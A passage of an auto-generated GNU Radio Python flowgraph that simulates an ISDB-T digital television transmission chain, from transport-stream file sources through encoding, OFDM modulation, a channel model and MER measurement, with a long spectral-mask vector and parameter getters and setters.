0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,
0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,
0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,
0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,
0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,-27.0,-27.0,-27.1,-27.1,-27.1,-27.2,-27.2,-27.2,-27.3,-27.3,-27.3,-27.4,-27.4,-27.4,-27.5,-27.5,-27.5,-27.6,-27.6,-27.6,-27.7,-27.7,-27.7,-27.8,-27.8,-27.8,-27.9,-27.9,-27.9,-28.0,-28.0,-28.0,-28.0,-28.1,-28.1,-28.1,-28.2,-28.2,-28.2,-28.3,-28.3,-28.3,-28.4,-28.4,-28.4,-28.5,-28.5,-28.5,-28.6,-28.6,-28.6,-28.7,-28.7,-28.7,-28.8,-28.8,-28.8,-28.9,-28.9,-28.9,-29.0,-29.0,-29.0,-29.1,-29.1,-29.1,-29.2,-29.2,-29.2,-29.3,-29.3,-29.3,-29.4,-29.4,-29.4,-29.5,-29.5,-29.5,-29.6,-29.6,-29.6,-29.7,-29.7,-29.7,-29.8,-29.8,-29.8,-29.9,-29.9,-29.9,-30.0,-30.0,-30.0,-30.0,-30.1,-30.1,-30.1,-30.2,-30.2,-30.2,-30.3,-30.3,-30.3,-30.4,-30.4,-30.4,-30.5,-30.5,-30.5,-30.6,
-30.6,-30.6,-30.7,-30.7,-30.7,-30.8,-30.8,-30.8,-30.9,-30.9,-30.9,-31.0,-31.0,-31.0,-31.1,-31.1,-31.1,-31.2,-31.2,-31.2,-31.3,-31.3,-31.3,-31.4,-31.4,-31.4,-31.5,-31.5,-31.5,-31.6,-31.6,-31.6,-31.7,-31.7,-31.7,-31.8,-31.8,-31.8,-31.9,-31.9,-31.9,-32.0,-32.0,-32.0,-32.0,-32.1,-32.1,-32.1,-32.2,-32.2,-32.2,-32.3,-32.3,-32.3,-32.4,-32.4,-32.4,-32.5,-32.5,-32.5,-32.6,-32.6,-32.6,-32.7,-32.7,-32.7,-32.8,-32.8,-32.8,-32.9,-32.9,-32.9,-33.0,-33.0,-33.0,-33.1,-33.1,-33.1,-33.2,-33.2,-33.2,-33.3,-33.3,-33.3,-33.4,-33.4,-33.4,-33.5,-33.5,-33.5,-33.6,-33.6,-33.6,-33.7,-33.7,-33.7,-33.8,-33.8,-33.8,-33.9,-33.9,-33.9,-34.0,-34.0,-34.0,-34.0,-34.1,-34.1,-34.1,-34.2,-34.2,-34.2,-34.3,-34.3,-34.3,-34.4,-34.4,-34.4,-34.5,-34.5,-34.5,-34.6,-34.6,-34.6,-34.7,-34.7,-34.7,-34.8,-34.8,-34.8,-34.9,-34.9,-34.9,-35.0,-35.0,-35.0,-35.1,-35.1,-35.1,-35.2,-35.2,-35.2,-35.3,-35.3,-35.3,-35.4,-35.4,-35.4,-35.5,-35.5,-35.5,-35.6,-35.6,-35.6,-35.7,-35.7,-35.7,-35.8,-35.8,-35.8,-35.9,-35.9,-35.9,-36.0,-36.0,-36.0,-36.0,-36.1,-36.1,-36.1,-36.2,-36.2,-36.2,-36.3,-36.3,-36.3,-36.4,-36.4,-36.4,-36.5,-36.5,-36.5,-36.6,-36.6,-36.6,-36.7,-36.7,-36.7,-36.8,-36.8,-36.8,-36.9,-36.9,-36.9,-37.0,-37.0,-37.0,-37.1,-37.1,-37.1,-37.2,-37.2,-37.2,-37.3,-37.3,-37.3,-37.4,-37.4,-37.4,-37.5,-37.5,-37.5,-37.6,-37.6,-37.6,-37.7,-37.7,-37.7,-37.8,-37.8,-37.8,-37.9,-37.9,-37.9,-38.0,-38.0,-38.0,-38.0,-38.1,-38.1,-38.1,-38.2,-38.2,-38.2,-38.3,-38.3,-38.3,-38.4,-38.4,-38.4,-38.5,-38.5,-38.5,-38.6,-38.6,-38.6,-38.7,-38.7,-38.7,-38.8,-38.8,-38.8,-38.9,-38.9,-38.9,-39.0,-39.0,-39.0,-39.1,-39.1,-39.1,-39.2,-39.2,-39.2,-39.3,-39.3,-39.3,-39.4,-39.4,-39.4,-39.5,-39.5,-39.5,-39.6,-39.6,-39.6,-39.7,-39.7,-39.7,-39.8,-39.8,-39.8,-39.9,-39.9,-39.9,-40.0,-40.0,-40.0,-40.0,-40.1,-40.1,-40.1,-40.2,-40.2,-40.2,-40.3,-40.3,-40.3,-40.4,-40.4,-40.4,-40.5,-40.5,-40.5,-40.6,-40.6,-40.6,-40.7,-40.7,-40.7,-40.8,-40.8,-40.8,-40.9,-40.9,-40.9,-41.0,-41.0,-41.0,-41.1,-41.1,-41.1,-41.2,-41.2,-41.2,-41.3,-41.3,-41.3,-41.4,-41.4,-41.4,-41.5,-41.5,-4
1.5,-41.6,-41.6,-41.6,-41.7,-41.7,-41.7,-41.8,-41.8,-41.8,-41.9,-41.9,-41.9,-42.0,-42.0,-42.0,-42.0,-42.1,-42.1,-42.1,-42.2,-42.2,-42.2,-42.3,-42.3,-42.3,-42.4,-42.4,-42.4,-42.5,-42.5,-42.5,-42.6,-42.6,-42.6,-42.7,-42.7,-42.7,-42.8,-42.8,-42.8,-42.9,-42.9,-42.9,-43.0,-43.0,-43.0,-43.1,-43.1,-43.1,-43.2,-43.2,-43.2,-43.3,-43.3,-43.3,-43.4,-43.4,-43.4,-43.5,-43.5,-43.5,-43.6,-43.6,-43.6,-43.7,-43.7,-43.7,-43.8,-43.8,-43.8,-43.9,-43.9,-43.9,-44.0,-44.0,-44.0,-44.0,-44.1,-44.1,-44.1,-44.2,-44.2,-44.2,-44.3,-44.3,-44.3,-44.4,-44.4,-44.4,-44.5,-44.5,-44.5,-44.6,-44.6,-44.6,-44.7,-44.7,-44.7,-44.8,-44.8,-44.8,-44.9,-44.9,-44.9,-45.0,-45.0), True, 1, [])
self.blocks_sub_xx_0_0_0 = blocks.sub_ff(1)
self.blocks_sub_xx_0_0 = blocks.sub_ff(1)
self.blocks_sub_xx_0 = blocks.sub_ff(1)
self.blocks_stream_to_vector_1_0_0 = blocks.stream_to_vector(gr.sizeof_float*1, 4096)
self.blocks_stream_to_vector_1_0 = blocks.stream_to_vector(gr.sizeof_float*1, 4096)
self.blocks_stream_to_vector_1 = blocks.stream_to_vector(gr.sizeof_float*1, 4096)
self.blocks_stream_to_vector_0_1 = blocks.stream_to_vector(gr.sizeof_gr_complex*1, 4096)
self.blocks_stream_to_vector_0_0 = blocks.stream_to_vector(gr.sizeof_char*1, 188)
self.blocks_stream_to_vector_0 = blocks.stream_to_vector(gr.sizeof_char*1, 188)
self.blocks_skiphead_0 = blocks.skiphead(gr.sizeof_gr_complex*data_carriers, 2)
self.blocks_rms_xx_0_0 = blocks.rms_ff(0.0001)
self.blocks_nlog10_ff_0 = blocks.nlog10_ff(10, 4096, -20*np.log10(4096))
self.blocks_multiply_const_xx_0 = blocks.multiply_const_cc(bb_gain)
self.blocks_keep_one_in_n_0_0 = blocks.keep_one_in_n(gr.sizeof_gr_complex*1, 14)
self.blocks_file_source_0_0 = blocks.file_source(gr.sizeof_char*1, '/home/mili/Documents/FACULTAD/2020/1er_Cuatrimestre/Radiodifusion/FINAL/layer_b.ts', True)
self.blocks_file_source_0_0.set_begin_tag(pmt.PMT_NIL)
self.blocks_file_source_0 = blocks.file_source(gr.sizeof_char*1, '/home/mili/Documents/FACULTAD/2020/1er_Cuatrimestre/Radiodifusion/FINAL/layer_a.ts', True)
self.blocks_file_source_0.set_begin_tag(pmt.PMT_NIL)
self.blocks_complex_to_mag_squared_0 = blocks.complex_to_mag_squared(4096)
self.analog_const_source_x_0_0_0 = analog.sig_source_f(0, analog.GR_CONST_WAVE, 0, 0, AjusteMascara)
self.analog_const_source_x_0_0 = analog.sig_source_f(0, analog.GR_CONST_WAVE, 0, 0, AjusteMascara)
self.analog_const_source_x_0 = analog.sig_source_f(0, analog.GR_CONST_WAVE, 0, 0, AjusteMascara)
##################################################
# Connections
##################################################
self.connect((self.analog_const_source_x_0, 0), (self.blocks_sub_xx_0, 1))
self.connect((self.analog_const_source_x_0_0, 0), (self.blocks_sub_xx_0_0, 1))
self.connect((self.analog_const_source_x_0_0_0, 0), (self.blocks_sub_xx_0_0_0, 1))
self.connect((self.blocks_complex_to_mag_squared_0, 0), (self.blocks_nlog10_ff_0, 0))
self.connect((self.blocks_file_source_0, 0), (self.blocks_stream_to_vector_0, 0))
self.connect((self.blocks_file_source_0_0, 0), (self.blocks_stream_to_vector_0_0, 0))
self.connect((self.blocks_keep_one_in_n_0_0, 0), (self.mer_probe_mer_c_0_0_0, 0))
self.connect((self.blocks_keep_one_in_n_0_0, 0), (self.qtgui_const_sink_x_0_0, 0))
self.connect((self.blocks_multiply_const_xx_0, 0), (self.channels_channel_model_0, 0))
self.connect((self.blocks_nlog10_ff_0, 0), (self.qtgui_vector_sink_f_0, 0))
self.connect((self.blocks_rms_xx_0_0, 0), (self.qtgui_number_sink_0_0, 0))
self.connect((self.blocks_skiphead_0, 0), (self.isdbt_pilot_signals_0, 0))
self.connect((self.blocks_stream_to_vector_0, 0), (self.dtv_dvbt_reed_solomon_enc_0, 0))
self.connect((self.blocks_stream_to_vector_0_0, 0), (self.dtv_dvbt_reed_solomon_enc_0_0, 0))
self.connect((self.blocks_stream_to_vector_0_1, 0), (self.fft_vxx_0, 0))
self.connect((self.blocks_stream_to_vector_1, 0), (self.qtgui_vector_sink_f_0, 1))
self.connect((self.blocks_stream_to_vector_1_0, 0), (self.qtgui_vector_sink_f_0, 2))
self.connect((self.blocks_stream_to_vector_1_0_0, 0), (self.qtgui_vector_sink_f_0, 3))
self.connect((self.blocks_sub_xx_0, 0), (self.blocks_stream_to_vector_1, 0))
self.connect((self.blocks_sub_xx_0_0, 0), (self.blocks_stream_to_vector_1_0, 0))
self.connect((self.blocks_sub_xx_0_0_0, 0), (self.blocks_stream_to_vector_1_0_0, 0))
self.connect((self.blocks_vector_source_x_0, 0), (self.blocks_sub_xx_0, 0))
self.connect((self.blocks_vector_source_x_0_0, 0), (self.blocks_sub_xx_0_0, 0))
self.connect((self.blocks_vector_source_x_0_0_0, 0), (self.blocks_sub_xx_0_0_0, 0))
self.connect((self.blocks_vector_to_stream_0_1, 0), (self.isdbt_carrier_modulation_0, 0))
self.connect((self.blocks_vector_to_stream_0_1_0, 0), (self.isdbt_carrier_modulation_0_0, 0))
self.connect((self.blocks_vector_to_stream_0_2_0, 0), (self.blocks_keep_one_in_n_0_0, 0))
self.connect((self.channels_channel_model_0, 0), (self.channels_impairments_0, 0))
self.connect((self.channels_impairments_0, 0), (self.blocks_stream_to_vector_0_1, 0))
self.connect((self.channels_impairments_0, 0), (self.low_pass_filter_0_0, 0))
self.connect((self.digital_ofdm_cyclic_prefixer_0, 0), (self.blocks_multiply_const_xx_0, 0))
self.connect((self.dtv_dvbt_inner_coder_0_0, 0), (self.blocks_vector_to_stream_0_1, 0))
self.connect((self.dtv_dvbt_inner_coder_0_0_0, 0), (self.blocks_vector_to_stream_0_1_0, 0))
self.connect((self.dtv_dvbt_reed_solomon_enc_0, 0), (self.isdbt_energy_dispersal_0, 0))
self.connect((self.dtv_dvbt_reed_solomon_enc_0_0, 0), (self.isdbt_energy_dispersal_0_0, 0))
self.connect((self.fft_vxx_0, 0), (self.blocks_complex_to_mag_squared_0, 0))
self.connect((self.fft_vxx_1, 0), (self.digital_ofdm_cyclic_prefixer_0, 0))
self.connect((self.isdbt_byte_interleaver_0, 0), (self.dtv_dvbt_inner_coder_0_0, 0))
self.connect((self.isdbt_byte_interleaver_0_0, 0), (self.dtv_dvbt_inner_coder_0_0_0, 0))
self.connect((self.isdbt_carrier_modulation_0, 0), (self.isdbt_hierarchical_combinator_0, 0))
self.connect((self.isdbt_carrier_modulation_0_0, 0), (self.isdbt_hierarchical_combinator_0, 1))
self.connect((self.isdbt_energy_dispersal_0, 0), (self.isdbt_byte_interleaver_0, 0))
self.connect((self.isdbt_energy_dispersal_0_0, 0), (self.isdbt_byte_interleaver_0_0, 0))
self.connect((self.isdbt_frequency_interleaver_0, 0), (self.blocks_skiphead_0, 0))
self.connect((self.isdbt_hierarchical_combinator_0, 0), (self.isdbt_time_interleaver_0, 0))
self.connect((self.isdbt_isdbt_rf_channel_decoding_0_0, 0), (self.isdbt_subset_of_carriers_0_0, 0))
self.connect((self.isdbt_pilot_signals_0, 0), (self.isdbt_tmcc_encoder_0, 0))
self.connect((self.isdbt_subset_of_carriers_0_0, 0), (self.blocks_vector_to_stream_0_2_0, 0))
self.connect((self.isdbt_time_interleaver_0, 0), (self.isdbt_frequency_interleaver_0, 0))
self.connect((self.isdbt_tmcc_encoder_0, 0), (self.fft_vxx_1, 0))
self.connect((self.low_pass_filter_0_0, 0), (self.isdbt_isdbt_rf_channel_decoding_0_0, 0))
self.connect((self.mer_probe_mer_c_0_0_0, 0), (self.blocks_rms_xx_0_0, 0))
def closeEvent(self, event):
    """Qt close hook: persist the window geometry, then accept the close."""
    settings = Qt.QSettings("GNU Radio", "top_block")
    settings.setValue("geometry", self.saveGeometry())
    self.settings = settings
    event.accept()
def get_samp_rate(self):
    """Return the current sample rate in samples/second."""
    return self.samp_rate

def set_samp_rate(self, samp_rate):
    """Update the sample rate and propagate it to dependent blocks.

    Rescales the vector sink's frequency axis (MHz) and rebuilds the
    low-pass filter taps for the new rate.
    """
    self.samp_rate = samp_rate
    self.qtgui_vector_sink_f_0.set_x_axis(-(self.samp_rate/2)/1e6, (self.samp_rate/4096)/1e6)
    self.low_pass_filter_0_0.set_taps(firdes.low_pass(1, self.samp_rate, 5.8e6/2.0, 0.5e6, firdes.WIN_HAMMING, 6.76))
def get_taps(self):
    """Return the multipath channel tap coefficients."""
    return self.taps

def set_taps(self, taps):
    """Update the channel taps; recompute the matching delay and push the
    new taps into the channel model block."""
    self.taps = taps
    self.set_delay((len(self.taps)/2)-1)
    self.channels_channel_model_0.set_taps((self.taps))
def get_mode(self):
    """Return the ISDB-T transmission mode."""
    return self.mode

def set_mode(self, mode):
    """Set the transmission mode and recompute the derived carrier counts
    (total carriers = 2**(10+mode); data carriers scale with 2**(mode-1))."""
    self.mode = mode
    self.set_total_carriers(2**(10+self.mode))
    self.set_data_carriers(13*96*2**(self.mode-1))
def get_total_carriers(self):
    """Return the total OFDM carrier count (set by set_mode)."""
    return self.total_carriers

def set_total_carriers(self, total_carriers):
    """Store a new total carrier count."""
    self.total_carriers = total_carriers

def get_symbol_table_QPSK(self):
